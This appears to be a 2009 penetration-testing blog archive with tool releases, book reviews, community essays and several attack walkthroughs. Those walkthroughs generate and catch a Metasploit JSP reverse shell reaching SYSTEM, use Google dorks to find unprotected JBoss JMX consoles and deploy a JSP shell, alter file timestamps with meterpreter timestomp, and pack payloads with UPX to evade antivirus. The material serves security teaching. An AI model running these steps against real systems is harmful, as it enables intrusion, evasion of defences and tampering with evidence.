Sunday, December 27, 2009

2009 Blog Stats


Since everyone else is doing it...

Top 10 posts of of the year 12/26/2008 - 12/26/2009 - blogspot

Adding your own exploits and modules in Metasploit
http://carnal0wnage.blogspot.com/2008/07/adding-your-own-exploits-in-metasploit.html

Gray Hat Python: Python Programming for Hackers and Reverse Engineers Book Review
http://carnal0wnage.blogspot.com/2009/05/gray-hat-python-python-programming-for.html

Dumping Memory to Extract Password Hashes
http://carnal0wnage.blogspot.com/2009/03/dumping-memory-to-extract-password.html

Using the Metasploit SMB Sniffer Module
http://carnal0wnage.blogspot.com/2009/04/using-metasploit-smb-sniffer-module.html

Metasploit and WMAP
http://carnal0wnage.blogspot.com/2008/11/metasploit-and-wmap_24.html

Metasploit + Karma=Karmetasploit Part 1
http://carnal0wnage.blogspot.com/2008/08/playing-with-karmasploit-part-1.html

Token Passing with Incognito
http://carnal0wnage.blogspot.com/2008/05/token-passing-with-incognito.html

Metasploit + Karma=Karmetasploit Part 2
http://carnal0wnage.blogspot.com/2008/08/metasploit-karmakarmasploit-part-2.html

Getting your smartcard to work with Ubuntu
http://carnal0wnage.blogspot.com/2008/11/getting-your-smartcard-to-work-with.html

msvctl -- pass the hash action
http://carnal0wnage.blogspot.com/2008/03/msvctl-pass-hash-action.html

Top 10 posts of of the year 12/26/2008 - 12/26/2009 -- AttackResearch

Release of the TOR Backdoor
http://carnal0wnage.attackresearch.com/node/376

Coming soon to a pentest near you... (assagi teaser)
http://carnal0wnage.attackresearch.com/node/366

Microsoft DirectShow MPEG2TuneRequest Stack Overflow P0C
http://carnal0wnage.attackresearch.com/node/370

Why I hate web app pentesting...
http://carnal0wnage.attackresearch.com/node/383

PDF Defiling Intro
http://carnal0wnage.attackresearch.com/node/362

Past, Present, and Future of Security and the Security Community
http://carnal0wnage.attackresearch.com/node/395

Failing the Test of Trust (guest post By Timelord)
http://carnal0wnage.attackresearch.com/node/386

More On Metasploit Meterpreter & Timestomp
http://carnal0wnage.attackresearch.com/node/390

Security Conferences, pen tests and incident response
http://carnal0wnage.attackresearch.com/node/361

Metasploit JSP Shells
http://carnal0wnage.attackresearch.com/node/389

Top 10 Keywords that brought people to the blog -blogspot

carnal0wnage
gsecdump
karmetasploit
carnal ownage
msvctl
metasploit oracle
metasploit
carnalownage
scapy
c:\windows\system32\2.exe

Top 10 Keywords that brought people to the blog - AttackResearch

metasploit oracle
client-side penetration testing notacon edition slides
node/24
carnal0wnage
ping sweep
tor backdoor
attack research
msvctl
phishing framework
maltego download

Top 10 Referring Sites - blogspot

ethicalhacker.net
metasploit.com
google.com
twitter.com
forums.remote-exploit.org
blogger.com
learnsecurityonline.com
carnal0wnage.com
penetrationtests.com
synjunkie.blogspot.com

Top 10 Referring Sites - AttackResearch

carnal0wnage.blogspot.com
ethicalhacker.net
blog.attackresearch.com
google.com
twitter.com
blog.metasploit.com
attackresearch.com
pentoo.ch
learnsecurityonline.com
pauldotcom.com

Top 10 Countries - blogspot

United States
United Kingdom
France
Germany
India
Canada
Italy
Spain
Australia
Brazil

Top 10 Countries - AttackResearch

United States
United Kingdom
France
India
Canada
Germany
Indonesia
Spain
Italy
Australia
CG

Friday, December 18, 2009

File Upload, Anti-Virus, UPX Packer, Mubix's article and a partridge in a pear tree.


Today I was asked to give a proof-of-concept as a fun way of entering the holiday season. The idea was to prove why file upload (without extension / file type checking) can be dangerous. The target client and web server were both using A/V. We already knew it was possible to upload whatever type of file you chose. The question was, as the administrators demanded would be the case, would the A/V stop such an attack.

The answer?

Using solely the technique gained Here , which is @Mubix's site......sadly......the answer is NO. Now a week ago this would have worked. Recent A/V updates have changed that. So how to get around it?

Note: I've been warned by @carnal0wnage
that this technique will most likely flag on some products because of the UPX packing.

That being said, it worked great against the A/V and it turned out to be a fun day.

Instructions:

Create and encode the meterpreter payload as instructed on Mubix's site (link above).

Download the UPX packer Here. I chose the upx-3.04-i386_linux.tar.bz2 for BT4.

Now simply bunzip2 & tar -xvf the file and cd into the upx directory. Perform a ./upx and consider the file packed. 

Happy Hacking!
cktricky

Beating Up On Oracle Book List


Need some last minute books to beat up on Oracle? Here's a list.





















(you'll have to go to the rampant press site http://www.rampant-books.com/book_0701_oracle_forensics.htm)




CG

Friday, December 11, 2009

Hackers -- Net Cafe Series Video circa 1996


From the old skool files...
This is the very first episode of the Net Cafe series. It was shot on location at a cybercafe in San Francisco called CoffeeNet. It looks at the hacker culture and their influence on the early growth of the internet. Guests include Dan Farmer, author of SATAN and COPS; Elias Levi (aka Aleph 1), webmaster of underground.org and Bugtraq; also "Reid Fleming" and "White Knight" from Cult of the Dead Cow. Originally broadcast in 1996.


CG

BToD Testing an Intranet site / 'do WWW Authentication'


I'm sure most folks have already used this feature but for those that haven't, I came across a situation recently where I was asked to test an Intranet application and found the 'do WWW Authentication' piece of functionality made life much easier for me.

So as you may know from my earlier post regarding extracting HTML comments using DirChex, Burp Suite and a Burp Suite Plugin this process is very quick and very simple.

DirChex is basically a dumb application. It is fed a list of URIs like so:

http://www.example.com/index.html
http://www.example.com/protected/shouldn't_be_available.html
http://www.example.com/hidden/mydatabasedump.txt
http://www.example.com/protected/TheMetsSuck.html

(That last line was for you Jack)

and it blindly requests each URI thru the proxy of your choice. The whole idea is to view the request/response as an unauthenticated user. I provide no options for setting a cookie/sessionID/login creds.

Here is the problem I ran into. I'm testing an Intranet application, the application uses NTLM which is tied to your Windows Domain account to receive access to the main page of the application. Only after you've first authenticated via your domain account will you have access to the actual application (which has a login form, technically your half authenticated?). So to test the "unauthenticated" portion you technically have to be authenticated :-)

This is where you can save your self some time. If you utilize the 'do WWW Authentication' option every request that is sent via Burp will automatically have the NTLM/Basic/Digest credentials included.

Navigate to the 'Comms' tab ('Options' tab in later version) and fill in the following:



Hope this helps someone.

Happy Hacking!
cktricky

Wednesday, December 9, 2009

DirChex Help / BT4 version


Hey folks,

Just as an update, if you downloaded the Backtrack 4 DirChex_v1.1 tool and are having issues with the install relating to the apt-get install libXXXX portion, ensure you enter "apt-get update" FIRST so that the newest packages and their corresponding locations are up to date.

Happy Hacking!
cktricky

Friday, December 4, 2009

Digging into SSL Cipher Checking


On a recent pentest one of the findings that came up (actually it seems like this finding is on every pentest) is the web server allowing SSLv2.

In the course of doing the report I of course wanted to point to a good reason why this was the case. It was actually difficult to find a CVE/CVSS/etc to say why its bad, in fact I never did. Kind of the same with allowing VRFY on your SMTP server. We all know its bad, but where is the proof.

Nevertheless, here are some links that were useful in understanding the problem.

http://www.foundstone.com/us/resources/whitepapers/wp_ssldigger.pdf
http://www.gnu.org/software/gnutls/manual/html_node/On-SSL-2-and-older-protocols.html
http://osvdb.org/show/osvdb/56387
http://www.schneier.com/paper-ssl.pdf
http://en.wikipedia.org/wiki/Secure_Sockets_Layer#Security
http://clearskies.net/blog/2009/03/01/insecure-ssl-and-how-pci-nearly-gets-it-right/

OSVDB updated their entry for SSLv2
http://osvdb.org/56387

Also a couple of tools to do some checking for you:

Foundstone's SSLDigger
http://www.foundstone.com/us/resources/proddesc/ssldigger.htm

nmap will do this for you with -A with port 443 open or with the sslv2 script
http://nmap.org/nsedoc/scripts/sslv2.html

ssl-cipher-check.pl from http://www.unspecific.com/ssl/

Example output from the tool site:

Usage:

$ perl ./ssl-cipher-check.pl
: SSL Cipher Check: 1.2
: written by Lee 'MadHat' Heath (at) Unspecific.com
Usage:
./ssl-cipher-check.pl [ -dvwas ] []
default port is 443
-d Add debug info (show it all, lots of stuff)
-v Verbose. Show more info about what is found
-w Show only weak ciphers enabled.
-a Show all ciphers, enabled or not
-s Show only the STRONG ciphers enabled.
Default Output:
$ perl ./ssl-cipher-check.pl mail.yahoo.com
Testing mail.yahoo.com:443
SSLv3:RC4-MD5 - ENABLED - STRONG 128 bits
SSLv3:DES-CBC3-SHA - ENABLED - STRONG 168 bits
SSLv3:RC4-SHA - ENABLED - STRONG 128 bits
** SSLv3:DES-CBC-SHA - ENABLED - WEAK 56 bits **
** SSLv3:EXP-RC4-MD5 - ENABLED - WEAK 40 bits **
** SSLv3:EXP-DES-CBC-SHA - ENABLED - WEAK 40 bits **
** SSLv3:EXP-RC2-CBC-MD5 - ENABLED - WEAK 40 bits **
SSLv3:AES128-SHA - ENABLED - STRONG 128 bits
SSLv3:AES256-SHA - ENABLED - STRONG 256 bits

TLSv1:RC4-MD5 - ENABLED - STRONG 128 bits
TLSv1:DES-CBC3-SHA - ENABLED - STRONG 168 bits
TLSv1:RC4-SHA - ENABLED - STRONG 128 bits
** TLSv1:DES-CBC-SHA - ENABLED - WEAK 56 bits **
** TLSv1:EXP-RC4-MD5 - ENABLED - WEAK 40 bits **
** TLSv1:EXP-DES-CBC-SHA - ENABLED - WEAK 40 bits **
** TLSv1:EXP-RC2-CBC-MD5 - ENABLED - WEAK 40 bits **
TLSv1:AES128-SHA - ENABLED - STRONG 128 bits
TLSv1:AES256-SHA - ENABLED - STRONG 256 bits

** SSLv2:RC4-MD5 - ENABLED - WEAK 128 bits **
** SSLv2:RC2-CBC-MD5 - ENABLED - WEAK 128 bits **
** SSLv2:DES-CBC-MD5 - ENABLED - WEAK 56 bits **
** SSLv2:EXP-RC4-MD5 - ENABLED - WEAK 40 bits **
** SSLv2:EXP-RC2-CBC-MD5 - ENABLED - WEAK 40 bits **
** SSLv2:DES-CBC3-MD5 - ENABLED - WEAK 168 bits **

*WARNING* 14 WEAK Ciphers Enabled.
Total Ciphers Enabled: 24

Links that go with the above tools

ssl-cipher-check author's talk slides
http://dc214.org/.go/presentations#mar2009

Disabling SSLv2 on a variety of services:
http://blog.zenone.org/2009/03/pci-compliance-disable-sslv2-and-weak.html

http://adamyoung.net/Disable-SSLv2-System-Wide
CG

Monday, November 30, 2009

Hacking Unprotected JBOSS JMX Console Installations


Nothing new, notes for later, actually got most of the info from:

http://www.notsosecure.com/folder2/2009/10/27/hacking-jboss-with-jmx-console/

http://goohackle.com/jboss-security-vulnerability-jmx-management-console/
http://www.nruns.com/_downloads/Whitepaper-Hacking-jBoss-using-a-Browser.pdf

The pdf (last link) actually details all the steps to get it done.

Google Dorks

intitle:”jboss management console” “application server” version inurl:”web-console”

intitle:”JBoss Management Console – Server Information” “application server” inurl:”web-console” OR inurl:”jmx-console”

Those searches will lead you to

http://somecrappysite.com/web-console/ServerInfo.jsp

will all kinds of fun information like below:


switch the URL to

http://somecrappysite.com/jmx-console/

and you'll either be greeted with a password prompt box (good) or the JMX Console page (not good--least for them)

Good

Bad

Very Bad

From there, just add the link to your cmd shell wrapped up in a war file. (check pdf for screenshot)

need to turn your .jsp into a .war?

jar -cf meh.war meh.jsp

From there enjoy access to your jsp shell.

Todo: Kick the shell to an msf instance via the msf jsp reverse shell
CG

Tuesday, November 24, 2009

Past, Present, and Future of Security and the Security Community


So just wanted to paste a few links to various views on the security community I have a come across lately.

The Extinction of Hackers by FX
http://www.phenoelit.net/extinction.html

The established community and its rules have the effect of distracting young hackers from their own, personal goals. You are not accepted as a hacker if you run Windows (there are very few exceptions). If you are not an established and respected person, you must run at least Linux, but never one of the large distributions like RedHat or Suse, even if your goal is hacking in the Microsoft .NET environment.

There is no doubt that working with Linux, FreeBSD, OpenBSD and MacOS X will teach you a lot. But if that's not what you are interested in, why bother? It just wastes a lot of valuable time, during which you could have read another book or two about the Windows architecture.
...

The community, the industry and the society as a whole needs smart, aggressive, young blood taking over the hacker's banner. It's time the role models realise what their task and their responsibility is, namely to encourage young hackers to do their own thing and stop to tell them how something should be done. This is not science; this is hacking, where reinventing the wheel is not necessarily a bad thing. The task is to help (re)inventing, not to show them your wheel from five years ago, it's rotten anyway.


Not Kind, Not Gentle. The turn of the decade in security. by Greg Hoglund
http://fasthorizon.blogspot.com/2009/11/not-kind-not-gentle-turn-of-decade-in.html

The decade in review: The most painful thing we learned is that computer security hasn’t worked. We are, at this very moment, MORE insecure than we were in the year 2000. Billions of dollars were wasted on security technology that isn't working. In the last ten years, true cybercrime was born. Maybe we were just na├»ve about the coming storm. At the turn of the century, it was hard to get past the romantic idea of a university student hacker who prowled systems harmlessly for fun. Blocking ports and preventing network based buffer overflow attacks seemed so important. None of this technology prevented true criminals from pulling off the biggest heist in computer history – the massive theft of identity and subsequent banking fraud of the last few years. The traditional hacker is dead. Hackers are now called terrorists. The Russian mafia pays developers six figure salaries to write rootkits and malware. Independent researchers can and will sell a reliable working exploit of Internet Explorer for more than $50,000 USD. It began to hurt so bad that even Microsoft had to jump on the secure coding bandwagon, declaring a massive effort to make their code more secure. But this isn’t working either. You see, we are adopting technology at a rate far faster than we can secure it. By the time we have secured something, the landscape has changed and the attackers have moved on. In fact, that is why desktop exploitation has become the dominant attack vector. Over the last few years, malicious documents and media, especially “rich content” that contains embedded logic, parse-able metacode or script, and other logical constructs that can be malformed, emerged as the dominant method of exploitation. The API’s, COM objects, and other hoo-hah piled sky high on your windows workstation is a garden of carnal delights to a skilled attacker. Exploits of this nature have been mostly delivered via Internet Explorer and email. In fact, Internet Explorer is quite possibly the largest software disaster ever. As a software program, it has probably caused over a hundred billion dollars in damages since its release. This isn't about blame - if IE wasn't there, someone else's browser would have been the target. The browser is the portal into the Enterprise, so it's going to be where the bad guys focus. Finally, even before all this was going on, every nation state on the planet was standing in the shadows scared out of their britches. Smart people in high (low?) places could see the writing on the wall. It is TRULY AMAZING that a terrorist hasn’t hacked into the SCADA systems of a municipal power utility, started a cascade failure, and shut down half a state in the dead of winter. It’s because of this that I think [most of] those so-called terrorists aren’t very bright. As we close out the first decade, we must realize we have just entered one of the biggest arms races in the history of warfare. In fact, one can easily say that true cyber warfare was birthed in the last ten years.

ZFO5
http://seclists.org/dailydave/2009/q3/47

The security scene is fucked. You have Dan Kaminsky lecturing you on how DNS poisoning will destroy life as we know it. You have Matasano harvesting talent and critiquing everyone, and then Ptacek can only announce the release of....a graphical firewall management client. There's kingcope killing bugs and dropping weaponized exploits while making no other contribution except putting a smile on the face of kiddies. There's iDefense and their competitors selling exploits and only doing research in how to make more exploits. There's Jeff Moss running a conference under the hideous misnomer "Blackhat Briefings" where the same researchers search for glory and present the same shit year after year. There are people who just live press release by press release. And on top of it all, somehow you STILL have not got rid of Kevin Mitnick. The industry cares about virtualization one year and iPhones the next, every year forgetting the lessons it should have picked up in the last.

If you are just someone looking to pay a fair price to not get owned, you find out quickly that none of these people exist to help you. Very few people in this industry have their income model based around actually making you more secure. At best, some of them have it based around convincing you that you are better off.

The very concept of "penetration testing" is fundamentally flawed. The problem with it is that the penetration tester has a limited set of targets they're allowed to attack, while a real attacker can attack anything in order to gain access to the site/box. So if a site on a shared host is being tested, just because site1.com is "secure" that does NOT in anyway mean that the server is secure, because site2.com could easily be vulnerable to all sorts of simple attacks. The time constraint is another problem. A professional pentester with a week or two to spend on a client's network may or may not get into everything. A real dedicated hacker making the slog who spends a month ofeight hour days WILL get into anything they target. You're lucky if it even
takes him that long, really.

Those things should all be very obvious, but whitehats still make the mistake of discounting them. Look at Mitnick. Every time he gets owned he blames his host or his DNS provider. If he's getting owned through them, that's still his fault. Choosing a host is a security decision, it's just like choosing a password. If you choose a weak one you expose yourself. It's still your fault.

It's the same with outsourcing the development of your security-critical code. Mitnick could get someone else to make him a flashy website, and then blame them when it is full of file include vulnerabilities. People do this all the time, indirectly, by using ridiculous CMS or blog software. As an easy example, look at Wordpress. Even easier, look at Wordpress in 2007. Horrid. When considering Wordpress, a blackhat starts reading the PHP, shudders and giggles, and then laughs at the idea of ever using it on one of their servers. A whitehat never gets that far apparently, they just install it and get owned. I simply fail to see how leading security researchers run all kinds of code that is blatantly dangerous. Are they really that bad at reading code? Or do they just not care much if their passwords end up on Full Disclosure? If it's the second option, why is that? Why can these people make a living selling security when they make such bad choices? How do they maintain legitimacy? They take less responsibility for getting owned than do the people who they sell services to.

There's a popular term for people who don't read code. We call them script kiddies.

You cannot outsource blame. You HAVE to take responsibility for your mistakes, whether they are mistakes in your code, mistakes in code you are using, mistakes by your host, or mistakes in who you trust. These are all security choices. Learn to control this shit. Learn how to read code. A lot of the time it only takes a very shallow audit to realise that the code is crap and is bound to have bugs. In a smarter world, security professionals get paid to stop people from getting owned. End of. These is no limit to the scope of an audit.

Are you professional types really this out of touch? I see all these papers about how to protect yourself from these super-fucking-advanced techniques and exploits that very few people can actually develop, and most hackers will NEVER USE. It's the simple stuff that works now, and will continue to work years into the future. Not only is it way easier to dev for simple mistakes, but they are easier to find and are more plentiful.

The whole concept of full-disclosure has backfired. It will never work. It's some slashdot hippie pipe dream. Even you dumbass corporate types should recognize this. If you're constantly giving away all the vulnerabilities you find, for *FREE* mind you (and what other industry does that?), and the vulnerabilities get harder and harder to find and exploit, it will get harder and harder for you all to do your "job". Frankly, I'm surprised that the non-disclosure movement didn't start in the security industry in the first place. In a way it did, by default. With full-disclosure, the security industry is all about show and gloat, it is not about fixing anything. A lot of bugs have been fixed from it, but it comes with the price of an industry that likes to cripple itself. Projects run by teams of trained monkeys are always eager to add more bugs to replace those that have been fixed.

We hate the industry because it is full of shit. There are so many trolls like Kaminsky who just desperately search for anything new, to get attention. So many talentless buffoons trying to scam the planet. A lot of the actual talent out there is severely misapplied. It's an industry tied to news and not results, because very few of you can even attain results. When you can't, who's the wiser? Your customers can hardly tell if you have really made them more secure or not. Sometimes there are superficial benefits, sometimes there aren't. How do you convince the customer that they are more ZF0-safe than before, if they were never targeted and probably never will be? And you all lack the legitimacy to really do the job you should anyways. We can only expose so many frauds, the rest of you can pretend you have changed something.

Very few whitehats actually go out there and provide a service where they make people more secure. Not just for a day or a month. Are you genuinely fixing the underlying design and logic flaws that generate security problems for your clients or customers? If you actually clean up every exposed security flaw they have, will they still be "secure" in six months or a year?

We could go on. Just in general, the industry is failing. Flat out failing.

You cannot even protect yourselves.

Powerful things to think about as we move forward into 2010. Thoughts?
CG

Tuesday, November 17, 2009

Customizing Your Metasploit Banner


Hey I'm as vain as the next security dude in the community so let's see how I can stroke my own ego with metasploit!!

Metasploit has awesome banners. Once you load it up you'll get your random banner or you can just keep typing banner to randomly get one. If you don't like hdm's banner hotness, you can always roll your own. And thanks to msf in color its never been easier to sexy up your ascii art.

I wanted to see carnal0wnage when I started it up.

Step one. Find and open banner.rb in your favorite editor. banner.rb is located in %msfdir%/lib/msf/ui (do I need to tell you to make a backup of the orig?)

Step two. Go to ascii art generator of choice and pick a few pimp ass ascii logos for whatever you want (even though metasploit is pretty damn cool as it is)

**keep in mind ticks (') and underscore (_) mean things in ruby so you probably cant use any ascii art that includes those.

***bonus credit for editing banner.rb to only have the cowsays and bet john strand you can ALWAYS get the cow on command.

Step three. Paste those into banner.rb with ticks and commas separating each banner.

Step four. Start metasploit and hope it doesn't blow up because you didn't read the note in step 2.

Step five. Cycle through you new pimp banners.









CG

Monday, November 16, 2009

Decompiling Flash Files with SWFScan


Inspired by Rafal Los' talk at AppSec DC I started taking a look at SWFScan.

SWFScan download

SWFScan FAQ

A good description here so I don't have to plagiarize

Did a quick search for login.swf and found one (actually lots). Let's fire up SWFScan and see what we can see.


Open it and decompile the .swf. We see a hardcoded password.


Just to be sure that it actually does any checking


Ok its working. They're not letting just anyone in there!


Because the code just jams the username and password box together we can just throw the whole thing in the username block or mix it up however you want.


weeeeeeeeeeeeee!



Just to make sure it wasnt beginner's luck...


Happy decompiling...

Additional Info can be found on the pdc #172 show notes:
http://pauldotcom.com/wiki/index.php/Episode172

Link to Blackhat talk
http://www.blackhat.com/presentations/bh-dc-09/Jagdale/BlackHat-DC-09-Jagdale-Blinded-by-Flash.pdf
CG

Tuesday, November 10, 2009

Metasploit In Color!


Metasploit now has color in MSFConsole. weeeeeeeee!


CG

Thursday, November 5, 2009

BToD Using Burp Extender & DirChex to extract all HTML comments


Today's Burp Suite Tip of the Day is a video showing quite a few things.

1) How to compile and package the Burp Extender utilizing BackTrack 4.

2) We build the plug-in coded by Daniele Costa (ref: portswigger.net )

3) How to install DirChex on BT4

4) How to utilize both DirChex and BurpSuite (along with plug-in) to extract all html comments from a web application.

You can download DirChex at DirChex Project Page

Enjoy & Happy Hacking!!

cktricky & BurpSuite Tip of the Day - Extracting HTML from cktricky on Vimeo.

cktricky

Wednesday, November 4, 2009

BackTrack 4 version of DirChex now available


Hey folks,

As promised k3r0s1n3 has delivered! We now have a BT4 specific version of DirChex_v1.1 available. If you navigate to the DirChex Project Page you can download the zip file containing the program and the install script. Just unzip the file, 'cd DirChex_v1.1' and then 'bash install.sh'...........that is about it!

Then fire up the program 'ruby DirChex_v1.1.rb'

Okay folks so here is a screenshot:




k3r0s1n3 is the man for whipping this up in such short time. You can visit his blog Here .

Also SPECIAL thanks to @mubix for helping to troubleshoot various errors for the release. Without his help the program wouldn't be a fully functioning stand-alone windows executable.

Happy Hacking!
cktricky

Tuesday, November 3, 2009

Side Note: DirSnatch_v2.0


So, in case you were annoyed by the .exe version of DirSnatch opening a console window along with the main program....you will be happy to know this has been removed. I've uploaded a recompiled version which does not require the console window pop-up.

It can be downloaded at the same location as always which is the DirSnatch Project Page.

Cheers,

cktricky

&

Happy Hacking!!!
cktricky

Adding DLLs with OCRA


Hey folks, for those of you who create wxruby apps and package them with OCRA but customers receive an error (Windows) about MSVCR** or MCVCP** missing (or something along those lines) here is what you do.

Simply copy over your DLL files (the ones the app complains about) to \Ruby\bin\ then run OCRA like so:

C:\ruby\lib\ruby\gems\1.8\gems\ocra\bin\ocra --dll MSVCR**.dll --dll MSVCP**.dll

AND you will be in business.

Cheers,

cktricky
cktricky

Monday, November 2, 2009

DirChex_v1.1 Release


As promised the follow-up program to DirSnatch ==> 'DirChex' has been released. You can download the tool Here The tool automates the task of requesting a list of URLs via an intercepting proxy with the User Agent of your choice.

Right now the layout suxx for BT4 so I wouldn't even bother trying BUT in case you wanted to the README offers up some instructions.

Lots of upgrades and different stuff to do so please let us know if you have problems, requests, etc. they are all welcomed.

By "us" I mean @k3r0s1n3 and I.

Here is a screenshot



One last thing, additional usage instructions for the tool are located on k3r0s1n3's blogs

Happy Hacking!
cktricky

Thursday, October 29, 2009

More On Metasploit Meterpreter & Timestomp


Well, probably "more" I honestly didn't look.

So there is blurb on the metasploit unleashed course on using timestomp. Unfortunately it leads you to believe that blanking the MACE values on a file or whole directory is better than hiding in plain sight. I suppose this can be debated (so feel free).

But... timestomp has a few other options worth discussing, notably setting MACE times from a file or individually setting attributes or setting all four attributes at once to a MACE time of your choosing.

meterpreter > timestomp

Usage: timestomp file_path OPTIONS


OPTIONS:

-a Set the "last accessed" time of the file

-b Set the MACE timestamps so that EnCase shows blanks

-c Set the "creation" time of the file
-e Set the "mft entry modified" time of the file
-f
Set the MACE of attributes equal to the supplied file
-h Help banner

-m
Set the "last written" time of the file
-r Set the MACE timestamps recursively on a directory

-v Display the UTC MACE values of the file

-z
Set all four attributes (MACE) of the file

Check our current values

meterpreter > timestomp C:\\boot.ini -v
Modified : Wed Aug 12 18:12:39 -0400 2009
Accessed : Thu Oct 29 16:13:12 -0400 2009
Created : Wed Aug 12 11:06:54 -0400 2009
Entry Modified: Wed Aug 12 18:23:34 -0400 2009

Set the Modified time to 11/11/2011 at 11:11:11

meterpreter > timestomp C:\\boot.ini -m "11/11/2011 11:11:11"
[*] Setting specific MACE attributes on C:\boot.ini


Did it work?

meterpreter > timestomp C:\\boot.ini -v
Modified : Fri Nov 11 11:11:11 -0500 2011
Accessed : Thu Oct 29 16:13:12 -0400 2009
Created : Wed Aug 12 11:06:54 -0400 2009

Entry Modified: Wed Aug 12 18:23:34 -0400 2009

Set them all to 11/11/2011 at 11:11:11

meterpreter > timestomp C:\\boot.ini -z "11/11/2011 11:11:11"

[*] Setting specific MACE attributes on C:\boot.ini


Did it work?

meterpreter > timestomp C:\\boot.ini -v

Modified : Fri Nov 11 11:11:11 -0500 2011
Accessed : Fri Nov 11 11:11:11 -0500 2011

Created : Fri Nov 11 11:11:11 -0500 2011

Entry Modified: Fri Nov 11 11:11:11 -0500 2011


From a file

meterpreter > timestomp C:\\update.exe -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Fri Oct 23 20:28:36 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004

meterpreter > timestomp C:\\update.exe -f C:\\boot.ini
[*] Setting MACE attributes on C:\update.exe from C:\boot.ini

meterpreter > timestomp C:\\update.exe -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Sat Oct 24 05:34:03 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004

meterpreter > timestomp C:\\boot.ini -v
Modified : Fri Apr 30 05:59:36 -0400 2004
Accessed : Sat Oct 24 05:34:03 -0400 2009
Created : Thu Apr 29 22:33:55 -0400 2004
Entry Modified: Fri Apr 30 06:22:35 -0400 2004



Happy Hiding in plain sight.

-CG
CG

Saturday, October 24, 2009

DirSnatch_v2.0 is released


Hey guys, well my brother @k3r0s1n3 and I decided to give an upgrade to DirSnatch before moving on to QwickR which is sort of like part 1 or 2.

Feel free to download the app at the DirSnatch Project Page

Anyway, here are some pics of the new version



Choosing directory to list









Choosing either http:// or https:// to prepend






Location to save the list to





This is what it will look like when all options are chosen




Beyond the obvious visual changes we've included error handling in this version. Okay folks, next up, QwickR!!

Happy Hacking!
cktricky

Thursday, October 22, 2009

DirSnatch has gone GUI


Hey all, as promised I have something coded up and it works well enough to release. Still a lot of functionality to add so you can give your customers something nice to look at it and fairly dummy proof.

DirSnatch, the script I wrote with @k3r0s1n3 was really something my customers liked (due to expedited testing times) but was basically really ugly. It was ugly because it was a dreaded console app :(

Okay, so using the ruby gems 'ocra' and 'wxruby' k3r0s1n3 and I were able to create a windows based stand-alone executable in GUI form.

Again, there is a TON to add to this tool and make it just cooler to work with.

Also, we are working on making Qwickr (formerly qwick_request) GUI.

Qwickr currently allows you to request URLs in a text file (such as the output from DirSnatch) in a threaded fashion thru the intercepting proxy of your choice. This is also helpful if you intercepting proxy doesn't allow you to save the URLs you've spidered. This creates a site map in no time.

The console version of Qwickr is finished but we don't want to release until its functioning as a GUI app. So be on the look out for that.

Here is a screen shot of DirSnatch_v1.1



This is what the output.txt looks like



So the new version can be download Here

The file annotated GUI_DirSnatch.rb works on linux but you must perform a 'gem install wxruby'

Happy Hacking!
cktricky

Metasploit JSP Shells


Stephen Fewer has pushed up a jsp reverse and jsp bind shell.

http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java

I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.

http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb


yomomma@c0:~/pentest/msf3.3dev$ ./msfpayload java/jsp_shell_reverse_tcp LHOST=192.168.10.1 R > blah.jsp

From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.

yomomma@c0:~/pentest/msf3.3dev$ ./msfconsole
=[ msf v3.3-dev [core:3.3 api:1.0]

+ -- --=[ 432 exploits - 261 payloads

+ -- --=[ 21 encoders - 8 nops

=[ 222 aux



msf > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp

set PAYLOAD java/jsp_shell_reverse_tcp

msf exploit(handler) > set LHOST 192.168.10.1

LHOST => 192.168.10.1

msf exploit(handler) > info


Name: Generic Payload Handler

Version: 6558

Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP

Privileged: No

License: Metasploit Framework License (BSD)


Provided by:
hdm

Available targets:

Id Name

-- ----

0 Wildcard Target


Payload information:

Space: 100000

Avoid: 0 characters



Description:

This module is a stub that provides all of the features of the

Metasploit payload system to exploits that have been launched

outside of the framework.


msf exploit(handler) > show options


Module options:


Name Current Setting Required Description

---- --------------- -------- -----------



Payload options (java/jsp_shell_reverse_tcp):


Name Current Setting Required Description

---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.


Exploit target:

Id Name
-- ----
0 Wildcard Target


msf exploit(handler) > exploit

[*] Starting the payload handler...

[*] Started reverse handler

[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)

Microsoft Windows [Version 5.2.3790]

(C) Copyright 1985-2003 Microsoft Corp.


C:\ColdFusion8\runtime\bin>
whoami
whoami

nt authority\system


C:\ColdFusion8\runtime\bin>
exit
exit


[*] Command shell session 1 closed.
CG

Attacking Oracle with Metasploit Blackhat USA 2009


Here's my Attacking Oracle with Metasploit Blackhat USA 2009 talk

Attacking Oracle with the Metasploit Framework BH USA 2009 from carnal0wnage on Vimeo.

CG

Tuesday, October 20, 2009

SQL Injection Attacks and Defense Book Review


SQL Injection Attacks and Defense Book Review

Justin Clarke (and others)

5 stars

Most Up To Date and Digestible Book on SQL Injection

First off, kudos to Syngress for putting out a high quality book. It looks like they are turning things around.

Second, kudos to the authors for finally explaining SQL Injection and exploiting the OS through the database in a understandable way. Previous books have tried and failed but this book succeeds in explaining what SQL Injection is, how the three forms (Error Based, Union Based, & Blind) of SQL Injection work, as well as post exploitation activities on various databases.

Here's what you get:

Chapter 1: What is SQL Injection?
Chapter 2: Testing for SQL Injection
Chapter 3: Reviewing Code for SQL Injection
Chapter 4: Exploiting SQL Injection
Chapter 5: Blind SQL Injection Exploitation
Chapter 6: Exploiting the Operating System
Chapter 7: Advanced Topics
Chapter 8: Code-Level Defenses
Chapter 9: Platform-Level Defenses
Chapter 10: References

Favorite chapters include "Review Code for SQL Injection", "Exploiting SQL Injection", and "Exploiting the Operating System".

